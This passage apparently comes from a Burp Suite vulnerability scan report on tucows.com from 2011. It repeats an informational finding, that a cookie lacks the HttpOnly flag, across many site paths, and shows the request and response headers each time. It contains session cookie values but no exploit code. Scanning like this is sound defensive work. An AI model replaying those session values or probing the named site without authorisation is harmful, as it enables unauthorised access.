The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...

13.256. http://www.tucows.com/images/newassets/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.257. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.258. http://www.tucows.com/images/newassets/includes/js/aalib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.259. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.260. http://www.tucows.com/images/newassets/includes/js/show_layer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.261. http://www.tucows.com/images/newassets/includes/js/signupin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.262. http://www.tucows.com/images/newassets/includes/js/x_core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.263. http://www.tucows.com/images/newassets/includes/js/xdocsize.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.264. http://www.tucows.com/images/newassets/includes/js/yetii.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.265. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.266. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.267. http://www.tucows.com/images/newassets/javascript:void(null)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.268. http://www.tucows.com/images/newassets/lostpass.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
